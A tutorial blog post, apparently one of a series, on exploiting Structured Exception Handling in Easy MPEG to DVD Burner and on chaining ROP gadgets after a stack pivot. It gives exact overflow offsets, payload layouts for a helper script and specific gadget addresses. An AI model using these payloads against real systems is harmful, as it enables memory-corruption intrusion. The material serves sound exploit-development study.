Windows Exploit Development : Exploiting Structured Exception Handling and ROP Chaining

Hi folks, this post is a continuation of a series I'm doing covering the fundamentals of Windows exploit development. In this post I'm going to inch a little closer to arbitrary code execution by showing you how to chain ROP gadgets, along with one or two stack pivoting tricks.

So here's how this post is going to go:

We're gonna look at how Structured Exception Handling works
We're gonna break it and show how it breaks
Then we're going to make it execute whatever code we want
Figure out how to fix our stack pointer
Chain some ROP gadgets

What you need

Windows Virtual Machine
Debugging Tools for Windows
Easy MPEG to DVD Burner (copy available on exploit-db)
ImmunityDBG
(optional) python script memcoder.py https://gist.github.com/k3170makan/7f55d25869f3f812f8c3706089c0a74c

Reverse Engineering Structured Exception Handling

Structured Exception Handling is a mechanism offered to functions that allows them to customize their responses to hardware and software exceptions. Hardware exceptions are events triggered outside of the process's control, or as the MS documentation puts it, "by the CPU". So you can imagine this means events or errors involving possible misuse of registers and memory, and perhaps maths operations on these values and the memory areas they refer to. Software exceptions are those defined by the processes themselves; these are triggered by things like wrong parameters, or operations on objects or custom data structures[1].

Exception handlers are merely places in memory that contain code, and are triggered when a given exception is generated. The system finds the correct handler by walking a linked list of handlers stored in stack memory.

Here's what this linked list looks like:

[7] - picture stolen from https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

Struct definition for the linked list members in an SEH chain, as defined in https://www.nirsoft.net/kernel_struct/vista/EXCEPTION_REGISTRATION_RECORD.html

So each item in this linked list basically has two fields in it. You can think of our input to the program (our payload of characters in the username registration value) as instructions for whatever code handles this linked list. This is because whatever value we use to overwrite the Next PEXCEPTION_REGISTRATION_RECORD will basically "steer" the direction in memory taken by the code that walks the structure. Furthermore, the other interesting value we can influence here is the PEXCEPTION_DISPOSITION Handler - this value is essentially treated as a pointer to a function that will be executed as the "current" exception handler.

So just to sum this up: the first position in the EXCEPTION_REGISTRATION_RECORD is the location of the next record in the chain, so it's an address in stack memory. The position after that is the address of some code to run that handles the exception, and the end of the list is marked with 0xffffffff.
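To make the two-field layout concrete, here is a minimal Python sketch of a 32-bit record using ctypes. The class name and the sample bytes are made up for illustration; only the field order (Next first, Handler second) comes from the struct definition referenced above.

```python
import ctypes

class ExceptionRegistrationRecord(ctypes.LittleEndianStructure):
    """32-bit layout: two 4-byte pointers, held here as plain integers."""
    _fields_ = [
        ("Next", ctypes.c_uint32),     # address of the next record, 0xFFFFFFFF at the end
        ("Handler", ctypes.c_uint32),  # address of the handler code for this record
    ]

# Eight bytes as they might sit on the stack (values are illustrative only).
raw = bytes.fromhex("ffffffff" "0b750310")
record = ExceptionRegistrationRecord.from_buffer_copy(raw)

record_size = ctypes.sizeof(ExceptionRegistrationRecord)
next_ptr = record.Next
handler_ptr = record.Handler
print(record_size, hex(next_ptr), hex(handler_ptr))
```

Note how the handler bytes 0b 75 03 10 read back as 0x1003750b: pointers are stored little-endian on x86, which matters as soon as we start writing addresses into a payload.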

The beginning of the chain of handlers is stored in the Thread Environment Block. This is just a dramatic name for a list of pointers in memory that hold certain environment attributes for the thread. Amongst the many things defined there, the beginning of the Structured Exception Handler list is stored in the 1st position on Windows 9x and NT systems[6].

https://en.wikipedia.org/wiki/Win32_Thread_Information_Block

Let's check out what this looks like for Easy MPEG to DVD Burner in WinDBG. You may need to break into the process first (Debug -> Break). If you do, make sure you change threads with the ~[thread number]s command before checking out the TEB information, because each thread has its own TEB!

The !teb command above displays some nicely formatted information about our TEB. You can also use the fs segment register (also referred to as the Extra Data register, as in an annex to the ds register[10]) to dump each value in the TEB as follows, since on 32-bit Windows fs points at the current thread's TEB and !teb is just reading from the same place anyway. Here's a quick look to confirm that the values are actually the same:

Keep in mind that when an exception is generated the system will walk down the list, calling each handler in turn until one of them handles the exception, it reaches the end, or it dies along the way.
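As a rough model of that walk, the sketch below follows Next pointers through a fake "stack" held in a Python dict. The addresses, the function name and the dict-as-memory idea are all assumptions made for illustration; the real walk is done by the system, not by anything like this code.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF

def walk_seh_chain(memory, head):
    """Follow Next pointers from `head`, collecting (record_address, handler) pairs.

    `memory` maps a record address to its 8 raw bytes and stands in for the
    thread's stack. The walk stops at the end marker or at an address that is
    not present in `memory` (an unmapped or corrupted pointer).
    """
    chain = []
    address = head
    while address != END_OF_CHAIN and address in memory:
        next_ptr, handler = struct.unpack("<II", memory[address])
        chain.append((address, handler))
        address = next_ptr
    return chain, address

# Made-up addresses, two records ending in the 0xffffffff marker.
fake_stack = {
    0x0019FF60: struct.pack("<II", 0x0019FFCC, 0x00401000),
    0x0019FFCC: struct.pack("<II", END_OF_CHAIN, 0x00402000),
}
chain, stopped_at = walk_seh_chain(fake_stack, 0x0019FF60)
for record_address, handler in chain:
    print(hex(record_address), "->", hex(handler))
```

If a record's Next field were overwritten with something like 0x41414141, the same loop would stop early with `stopped_at` holding that bogus address, which is roughly what the debugger shows once the chain is corrupted.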

Quick memcoder script tutorial

Before I start injecting values here I must apologize for the horrible helper script I suggested in the previous post, by suggesting another potentially bad one. Only this one is much simpler in design, and I think it's actually useful and pretty simple to extend and understand. The script I'm going to use is called memcoder.py; it's a simplistic byte string writer tool for exploit development. I've hosted it here if you want to grab a copy. memcoder is pretty simple to use: it accepts a simple grammar and an arbitrary number of parameters, and all you do is give it a list of values to write out to the screen as a payload. The parameters that will be written out as a payload are of this format:

[byte pattern]"-"[number]

Where [byte pattern] is a list of hexadecimal byte values in the format [digit digit]"_"
and [number] is just the number of times you would like that byte pattern written out. The idea is you give it a list of these values and it returns them as a payload. As an example, let's say I want to have a list of "A"s as a payload. This means I would give memcoder.py these parameters:

memcoder.py 41_41_41_41-10

Which means write out four 0x41 values 10 times - so 40 "A"s in total, since 0x41 is the hexadecimal ASCII value of the letter "A" as we already know. Here's some more examples:
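Since the grammar is so small, it can also be sketched in a few lines of Python. To be clear, this is not the memcoder.py source, just a stand-in with hypothetical function names (expand, build). It emits the bytes in the order they are written, which is an assumption; the real script may order or print them differently.

```python
def expand(spec):
    """Expand one '[byte pattern]-[number]' argument into bytes.

    '41_41_41_41-10' becomes the bytes 0x41 0x41 0x41 0x41 repeated 10 times.
    Bytes are emitted in the order written (an assumption, see above).
    """
    pattern, _, count = spec.rpartition("-")
    chunk = bytes(int(pair, 16) for pair in pattern.split("_"))
    return chunk * int(count)

def build(specs):
    """Concatenate the expansion of every argument, left to right."""
    return b"".join(expand(spec) for spec in specs)

payload = build(["41_41_41_41-10"])
print(len(payload), payload[:8])
```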

And that's it! Let's get back to corrupting and controlling the SEH handler.

Exploiting Structured Exception Handling

Now let's look at what happens when you corrupt the handler. After giving it 1000 characters (preferably "A"s) as input, the process will raise an exception and you will be able to check out some stuff in WinDBG. Using memcoder you should give it 4-byte wide patterns to copy; it just makes reading memory values and comparing them in your head much, much easier in my opinion. Also, single chars will be printed with spaces between them because of how memcoder is scripted. Here's the command I used to generate my test payload of 1000 chars:

memcoder.py 41_41_41_41-250

Because 250 = 1000 / 4. So after we give it the payload and it breaks in, let's check out what happens if we traverse the SEH chain ourselves:

Let's walk the SEH chain manually then. We can dump the start of the chain with the dc fs:[0] command and unpack it from there:

Here's what you see when you follow the chain all the way down:

As can be seen in the screenshot below, we overflowed the value for both the "Next" position in the chain and the immediate exception handler at the current position. What effectively happens is the system tries to run code at 0x41414141, finds that this memory address doesn't exist, so it can't run anything there and crashes! But it doesn't have to; we can give it an address to run!

But before we do that, we need to figure out how much to write in order to precisely overwrite the SEH handler pointers. As we can see from the screenshot, 250 4-byte values means that we hit the SEH handler at 0x0019a1c0 and then some, by 3 characters. So to make sure we can control those regions in memory precisely, let's shorten the run of 0x41414141 values and end the payload with a Next SEH value of 0x42424242 and a current handler address of 0x43434343. So that means we want this setup for memcoder:

41_41_41_41-247 42_42_42_42-1 43_43_43_43-1

Which results in this when it's injected:
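For reference, the byte offsets implied by that 247 / 1 / 1 split can be double-checked in Python. This is only arithmetic on the payload itself, assuming the whole input is copied into memory as one contiguous run; the variable names are mine.

```python
FILLER_DWORDS = 247
DWORD = 4

filler = b"\x41" * (FILLER_DWORDS * DWORD)
next_seh = b"\x42" * DWORD   # lands in the Next field of the record
handler = b"\x43" * DWORD    # lands in the Handler field of the record
payload = filler + next_seh + handler

next_offset = payload.index(next_seh)
handler_offset = payload.index(handler)
print(next_offset, handler_offset, len(payload))
```

So under that assumption the Next pointer sits 988 bytes into the input and the handler pointer 992 bytes in, with 996 bytes written in total.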

Yaay, we at least know where our payload is ending up in memory. Of course we're going to need to find an address value that we can pass to the program as an ASCII string, so any byte that would delimit the string is out of the question as a payload value. I find it more fun to find out what these values are along the way, but of course you can imagine they are things like:

0xa \n - a line feed
0xd \r - a carriage return
0x0 null byte - a string terminator

And perhaps one or two others, depending on how the payload makes its way into the username field in practice. Some articles I reference below have a clever way of working out what will be a bad character to use in a memory address, but I think you're better off trying one after the other until you find one that works - it's usually pretty straightforward to determine which character won't join the party in memory. But if you need a concrete view of your search space I fully recommend checking them out.
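A quick way to screen candidate addresses against a bad-character list is sketched below. The list only holds the three bytes named above, so treat it as a starting assumption rather than the definitive set for this target. The function name is hypothetical, and the two sample addresses are ones used later in this post.

```python
import struct

BAD_BYTES = {0x00, 0x0A, 0x0D}  # null, line feed, carriage return

def bad_bytes_in(address, bad=BAD_BYTES):
    """Return the bad byte values found in a 32-bit little-endian address."""
    packed = struct.pack("<I", address)
    return sorted(set(packed) & bad)

for candidate in (0x1003750B, 0x00404E11):
    found = bad_bytes_in(candidate)
    verdict = "clean" if not found else "contains " + ", ".join(hex(b) for b in found)
    print(hex(candidate), verdict)
```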

Remembering something from the previous post: we found out that ASLR can change where certain modules end up in memory. We can find out which modules are affected by checking where they are loaded in memory, choosing an instruction from one of them, and then testing whether it is always loaded at the same address. Alternatively you could whip out Immunity DBG and Mona.py and use the rop command; I've linked some tutorials about this at the end of the post. But in case you need a quick crash course, all you need to do is:

Install Immunity Debugger (super easy to do)
Download Mona.py link provided here
Open the target app in Immunity Debugger (File->Open : search for Easy MPEG to DVD Burner)
In the command bar at the bottom type !mona rop
Find and open the rop.txt file

Once you get that down you should see the following: a list of addresses for potential ROP gadgets. We are going to start injecting them straight from the get-go here! As a simple example, just to make sure we can actually inject correctly, let's take the address 0x1003750b and build a payload using memcoder like this:

python.exe memcoder.py 41_41_41_41-247 42_42_42_42-1 10_03_75_0b-1

And here's me injecting the finished payload with our next fake exception handler on the end of it:

Now when it breaks in because of the exception being generated, we can make sure that the code we targeted actually runs by setting a break point and seeing if the thread actually runs that code! In the screenshot above you can see me set a break point for the address we injected. Check out what happens when I let it run and handle the exception:

Voila! I just crafted some code execution by overwriting a structured exception handler! Now let's chain some ROP gadgets!

Pivoting the Stack Pointer and Chaining ROP Gadgets

Okay so we can execute code, our input is now literally controlling execution. What we need to do now is be able to inject more than one instruction.

Before we go on we should talk about what ROP (Return-Oriented Programming) gadgets are. A while back folks worked out that you can bypass the reliance on directly injecting code into memory during exploitation (which stopped working because of Data Execution Prevention, a measure that disables execution in certain memory ranges). They figured out that if you inject the address of an instruction sequence that performs some simple operation and then returns immediately afterwards, it's possible to combine such sequences to load registers with certain values, place certain values on the stack and eventually make calls to certain enabling functions in the modules available to Windows processes. These functions allow the injected payload to be executed as code.

Back to the predicament we find our exploit in. Why can't we inject more than one? Well, when that one little ROP gadget is done executing it will return control to whatever called it, and as far as this piece of code is concerned that caller is us! So the gadget will try to return as though everything is hunky-dory and then crash, because the stack pointer (which points at the value eip will assume when the function returns) probably doesn't point at the address of executable code, or of anything that looks enough like code.

To get a grip on how the ret (return) instruction works, let's change the esp value just before it's executed and see where it tries to continue executing afterwards:

What we can see from the above screenshot is that the esp value clearly has something to do with the value eip assumes after the ret instruction is executed. Of course it must then be important what the esp value is after executing the first instruction we inject as the "fake" SEH handler.
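The relationship between esp and eip can be modelled in a few lines of Python. This is a toy model of a 32-bit near ret over a byte buffer, where esp is treated as an offset into that buffer; the values on the fake stack are made up.

```python
import struct

def ret(stack, esp):
    """Model a 32-bit near `ret`: load the dword at esp into eip, then esp += 4."""
    (eip,) = struct.unpack_from("<I", stack, esp)
    return eip, esp + 4

# Three made-up dwords sitting on a fake stack.
stack = struct.pack("<III", 0x11111111, 0x22222222, 0x33333333)

eip_a, esp_a = ret(stack, 0)  # esp points at the first dword
eip_b, esp_b = ret(stack, 4)  # same ret, but esp was nudged by 4 beforehand
print(hex(eip_a), esp_a, hex(eip_b), esp_b)
```

Changing esp before the ret changes where execution continues, which is the same effect as editing esp in the debugger.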

The process of updating the esp value so that it allows us to chain instructions and reliably control where ret instructions will land us is called "stack pivoting", or sometimes "stack lifting". What we need is a way to change the esp value so that it goes from pointing somewhere in memory that we cannot influence with our input to somewhere we can. So we need to execute some instruction that either adds to, replaces, subtracts from or otherwise nudges esp in the right direction. One such instruction is this one at 0x00404e11:

Now we need a way to inject this address into memory as an ASCII string. But there's a problem here of course: it contains a null byte at the beginning! Not to fret, it's not odd for null bytes to naturally turn up around your payload in memory. If you need a null byte at the end of the payload it often ends up there anyway, because printable string input is usually null-terminated when written into memory. Sometimes it isn't, and funnily enough that can cause a memory corruption issue of its own!

Here's a payload you could try with memcoder,

41_41_41_41-248 40_4e_11-1

Notice we are not writing a full 4 bytes as the last argument, check out what happens as a result:

Okay so it looks like this instruction adds 0x778 to the value of the stack pointer and then returns. Here's some hard evidence the stack pointer actually does update and points to an area with a suspicious amount of 0x41 bytes all over the place hmmm:

We now have control of the eip and the esp! We just need to find out how far into our payload the esp ends up pointing at. After we know that we will be able to place another pointer to the next ROP gadget in the chain, at this point we can then literally chain gadgets together and get stuff done to be able to execute our payload.
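Here is a small Python model of what the pivot gadget does, assuming it behaves as observed above (add 0x778 to esp, then ret). The base address, the starting esp and the position of the 0x41 bytes are all made up; only the 0x778 distance comes from this post.

```python
import struct

PIVOT_DISTANCE = 0x778  # from the post: the gadget adds 0x778 to esp

def pivot_then_ret(memory, base, esp):
    """Model `add esp, 0x778` followed by `ret` over a flat byte buffer.

    `memory` holds the bytes that start at address `base`.
    """
    esp += PIVOT_DISTANCE
    (eip,) = struct.unpack_from("<I", memory, esp - base)
    return eip, esp + 4

base = 0x0019A000                       # made-up start of the modelled stack region
memory = bytearray(0x1000)              # zero-filled fake stack
memory[0x800:0xC00] = b"\x41" * 0x400   # pretend our input landed here

esp_at_handler = 0x0019A100             # made-up esp when the fake handler runs
eip, esp = pivot_then_ret(memory, base, esp_at_handler)
print(hex(eip), hex(esp))
```

In this model the ret after the pivot reads its return address from inside our 0x41 bytes, so whichever dword of the input sits at that spot decides where execution goes next.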

So how far into our input string does it return to? How are we going to figure this out? Well, we guess, the same way we figured out which part of our input was replacing the SEH value. We can poke around in memory by splitting our payload up into sections. We can add another pair of characters, 0x42 and 0x43. 0x42 is going to be what lies before the first esp value and 0x43 will make up the esp value itself. Here's what a guessed memcoder payload looks like:

42_42_42_42-10 43_43_43_43-10 41_41_41_41-228 40_4e_11-1

Here's the result:

This clearly means that in guessing 10 4-byte values we guessed 1 too many. We can try using 9 instead, so that the 4-byte value that follows them becomes the pointer to the new ROP gadget. Here's the updated payload:

42_42_42_42-9 43_43_43_43-1 41_41_41_41-238 40_4e_11-1

and the result:

More good news! We finally pivoted the stack and we can start chaining ROP gadgets! Grab that rop.txt and start trying some gadgets! Here's an example chain payload:

42_42_42_42-9 10_03_3e_3c-1 22_22_22_22-1 41_41_41_41-237 40_4e_11-1

The gadget we injected pops a value into eax, which means it takes the value sitting right after the gadget's address on the stack and moves it into eax. The r command in the screenshot shows that eax actually does contain this value. Another example chain could repeat that gadget, changing the value of eax every time, for instance:

And here again it looks like eax is playing along with our tactics!
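To see why the chain behaves this way, here is a toy Python simulation of it. It assumes the pivoted esp lands 36 bytes (9 dwords) into the input, as worked out above, that the gadget at 0x10033e3c is a plain pop eax followed by ret, and that addresses are laid out little-endian. The run_chain helper and its gadget table are hypothetical and only model pop-style gadgets.

```python
import struct

POP_EAX_RET = 0x10033E3C  # gadget address used in the post

def run_chain(stack, esp, gadgets, max_steps=16):
    """Follow rets through `stack`, applying the pops listed for each known gadget."""
    regs = {"eax": 0}
    trace = []
    for _ in range(max_steps):
        (eip,) = struct.unpack_from("<I", stack, esp)  # ret: pop the next address
        esp += 4
        trace.append(eip)
        if eip not in gadgets:      # landed somewhere we have no gadget for
            break
        for reg in gadgets[eip]:    # each pop takes the next dword off the stack
            (regs[reg],) = struct.unpack_from("<I", stack, esp)
            esp += 4
    return regs, trace

gadgets = {POP_EAX_RET: ["eax"]}
stack = (
    b"\x42" * 36                         # 9 dwords before the pivoted esp
    + struct.pack("<I", POP_EAX_RET)     # first address the pivot's ret picks up
    + struct.pack("<I", 0x22222222)      # value popped into eax
    + b"\x41" * (237 * 4)                # filler, doubles as the next "return address"
)
regs, trace = run_chain(stack, 36, gadgets)
print(hex(regs["eax"]), [hex(a) for a in trace])
```

Repeating the gadget address and value pair back to back extends the chain, with eax ending up holding whichever value was popped last.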

There are more registers to play with, so make sure you're good at getting whatever value you like into whatever register you like. Beyond this, it's very rewarding to practice figuring out what the limitations are in getting certain values into certain registers. For instance, what if an instruction you need just doesn't exist? How do you get around that? In the next post we will talk about how to inject arbitrary instructions straight into the process to get full code execution going.

k3170
